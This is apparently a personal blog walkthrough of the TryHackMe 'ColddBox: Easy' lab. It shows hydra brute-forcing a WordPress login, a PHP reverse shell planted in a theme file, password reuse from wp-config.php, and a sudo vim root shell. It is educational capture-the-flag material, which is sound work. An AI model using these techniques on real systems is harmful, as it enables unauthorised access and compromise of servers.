narancs's blog

TryHackMe – ColddBox: Easy walkthrough

Introduction

TryHackMe ColddBox Easy logo

ColddBox: Easy is an easy difficulty room on TryHackMe. We can get into a WordPress admin panel after a quick enumeration of the website. Once we are logged in, we can insert a PHP reverse shell into the page to get initial access on the host. Then we need to escalate privileges to a normal user, then root user to get both flags.

Enumeration

Note: I have added the IP address of the VM to /etc/hosts as colddbox.thm, so I don’t have to use the IP

nmap

Results of nmap scan:

There are 2 open ports. HTTP server is running on port 80, and SSH is open on port 4512. Since we don’t know any possible usernames yet, I started to enumerate the website first.

gobuster

I used gobuster to get a list of files/directories on the page.

				
					dir --url http://colddbox.thm -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 32 -x txt,sql,php,html
				
			

We can see that this is a website built with WordPress. Also there is a /hidden directory. I checked that first. It contains some text, that gives us a few possible usernames.

  • c0ldd
  • hugo
  • philip

hydra

Since I found 3 possible usernames, I started brute-forcing the password for WordPress login. So, I went to /login.php page, and tried entering some passwords for each user. I noticed, that if I enter the username admin and try a password, I receive the following error message:

ERROR: Invalid username.

However, if I enter one of the 3 usernames I listed above, I receive a different error. For example:

ERROR: The password you entered for the username hugo is incorrect.

This indicates that those 3 users actually exist in WordPress. I used hydra to brute-force the password. Eventually I found a valid password for c0ldd, who happened to be the administrator of WordPress, so I did not need to continue with the other 2 users.

First, I sent a login request to login.php that I captured in BurpSuite. This helps to quickly find the payload that has to be used in hydra for brute-forcing.

The data that has to be sent to the login page is

				
					log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
				
			

where ^USER^ and ^PASS^ are special placeholders used by hydra. I know that the error message will contain the word “incorrect” if the login attempt is failed with a valid username, but incorrect password. So, I can use that word in hydra to filter out the unsuccessful login attempts. The final command is:

				
					hydra -l c0ldd -P /usr/share/wordlists/rockyou.txt colddbox.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1:incorrect"
				
			

Exploitation

I logged in with the found credentials. Since c0ldd user is the administrator, I can edit any of the PHP files in menu Appearance -> Editor. Then, I modified the Sidebar (sidebar.php) file to add a reverse shell.

I used the following reverse shell code: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php. I removed the opening and closing php tags (first and last row), then updated the IP address and port number in the file accordingly. Then, I pasted the code into the sidebar.php file right after the opening php.

I started a listener in my Kali VM, then reloaded the home page of the colddbox website and I received a shell as www-data user.

user.txt

There is only 1 user who has home directory: c0ldd. It contains the user flag, but as www-data user we cannot read the file. Somehow we need to switch to c0ldd user.

I was checking the files in the root directory of the website, when I found the configuration file for WordPress (/var/www/html/wp-config.php). It contained the credentials for the database user. I tried to switch to c0ldd user using the same password, and it worked.

				
					www-data@ColddBox-Easy:/home/c0ldd$ su - c0ldd
Password: 
c0ldd@ColddBox-Easy:~$ cat user.txt 
RmV***HIDDEN***vIQ==
				
			

root.txt

Then I had to escalate my privileges to root. I checked the sudo permissions of the user, and there are 3 commands that c0ldd user can execute with sudo.

				
						c0ldd@ColddBox-Easy:~$ sudo -l
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
c0ldd@ColddBox-Easy:~$
				
			

GTFOBins website contains a bypass for any of these commands to gain root access. I used vim to spawn a root shell and get the root flag: https://gtfobins.github.io/gtfobins/vim/.

				
					c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'
# cat /root/root.txt
wqF***HIDDEN***YSE=
				
			

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x